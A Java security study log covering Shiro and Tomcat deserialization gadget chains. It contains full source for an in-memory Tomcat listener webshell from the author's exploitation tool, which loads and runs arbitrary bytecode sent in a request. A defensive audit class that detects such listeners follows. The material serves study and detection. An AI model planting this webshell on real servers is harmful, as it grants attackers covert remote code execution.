Java Security from Zero

Most of this is written on Notion; I'll see later whether to migrate it over.

Java Fundamentals

Things like class file structure, the class loading mechanism, and how dynamic proxies and annotations are implemented; I'll organize these and add them later.

YSoSerial Gadget Chain Study

https://www.notion.so/YSoSerial-c459fbe2a6db4da2aacef352c048c502

Shiro Deserialization Gadget Chain

Written following my own approach; the difference from CommonsCollectionsK1 is that it does not use InvokerTransformer, using InstantiateTransformer instead.

https://www.notion.so/Shiro-e0b845980c8444ad946925b602a42d1d

Tomcat Echo (Response Output) Gadget Chain

https://www.notion.so/Tomcat-8ebb706db1ee47ec94052b42f24a9027

Tomcat In-Memory Webshell

To be organized

Shiro Deserialization Exploitation Tool

The core logic is a Listener that extends the AbstractTranslet class and implements the ServletRequestListener interface, so that it can load an arbitrary class and invoke its methods.

```java
public class Init extends AbstractTranslet implements ServletRequestListener {
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { }
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { }
    public Init() throws Exception {
        super();
        super.namesArray = new String[]{"ccdr4gon"};
        WebappClassLoaderBase webappClassLoaderBase = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        StandardContext standardCtx = (StandardContext) webappClassLoaderBase.getResources().getContext();
        standardCtx.addApplicationEventListener(this);
    }

    @Override
    public void requestDestroyed(ServletRequestEvent sre) {}
    @Override
    public void requestInitialized(ServletRequestEvent sre) {
        try {
            RequestFacade requestfacade = (RequestFacade) sre.getServletRequest();
            Field field = requestfacade.getClass().getDeclaredField("request");
            field.setAccessible(true);
            Request request = (Request) field.get(requestfacade);
            if (request.getParameter("stage").equals("init")) {
                StringBuilder sb = new StringBuilder("");
                BufferedReader br = request.getReader();
                String str;
                while ((str = br.readLine()) != null) {
                    sb.append(str);
                }
                byte[] payload = Base64.getDecoder().decode(sb.toString());
                Method defineClass = Class.forName("java.lang.ClassLoader").getDeclaredMethod("defineClass", byte[].class, int.class, int.class);
                defineClass.setAccessible(true);
                Class clazz = (Class) defineClass.invoke(Thread.currentThread().getContextClassLoader(), payload, 0, payload.length);
                clazz.newInstance();
            }
        } catch (Exception ignored) { }
    }
}
```

ccdr4gon/Dr4gonSword (github.com)
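The listener above is registered only in memory through `addApplicationEventListener`, so it never appears in web.xml. The defender-side check below is an added example, not code from the post or the Dr4gonSword project: it enumerates the event listeners actually registered on the current StandardContext and flags any that was not declared, that extends AbstractTranslet, or whose class has no code source location (what a class defined straight from a byte[] looks like). The class name `ListenerAudit` and running it from a diagnostic servlet inside the same webapp are assumptions.

```java
// Added example (assumption: runs inside the Tomcat webapp being inspected,
// e.g. from an operator-only diagnostic servlet). Not part of the original post.
import org.apache.catalina.core.StandardContext;
import org.apache.catalina.loader.WebappClassLoaderBase;

import java.security.CodeSource;
import java.security.ProtectionDomain;
import java.util.*;

public class ListenerAudit {
    private static final String TRANSLET =
            "com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet";

    /** Returns one finding line per suspicious listener instance registered on ctx. */
    public static List<String> auditEventListeners(StandardContext ctx) {
        // Listener classes declared via web.xml / @WebListener / ServletContext.addListener
        Set<String> declared = new HashSet<>(Arrays.asList(ctx.findApplicationListeners()));
        List<String> findings = new ArrayList<>();
        for (Object listener : ctx.getApplicationEventListeners()) {
            Class<?> c = listener.getClass();
            boolean undeclared = !declared.contains(c.getName());
            boolean translet = extendsTranslet(c);          // the pattern used by Init above
            boolean noSource = codeSourceLocation(c) == null; // defineClass(byte[]) leaves no jar/dir
            if (undeclared || translet || noSource) {
                findings.add(c.getName() + " undeclared=" + undeclared
                        + " extendsAbstractTranslet=" + translet
                        + " noCodeSource=" + noSource
                        + " loader=" + c.getClassLoader());
            }
        }
        return findings;
    }

    private static boolean extendsTranslet(Class<?> c) {
        for (Class<?> s = c.getSuperclass(); s != null; s = s.getSuperclass()) {
            if (TRANSLET.equals(s.getName())) return true;
        }
        return false;
    }

    private static Object codeSourceLocation(Class<?> c) {
        ProtectionDomain pd = c.getProtectionDomain();
        CodeSource cs = pd == null ? null : pd.getCodeSource();
        return cs == null ? null : cs.getLocation();
    }

    /** Locates the StandardContext the same way the post's listener does. */
    public static List<String> auditCurrentContext() {
        WebappClassLoaderBase loader = (WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        return auditEventListeners((StandardContext) loader.getResources().getContext());
    }
}
```

Frameworks that register listeners programmatically will also show up as undeclared, so treat that flag alone as noise; a listener that both extends AbstractTranslet and has no code source location is the strong signal here.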
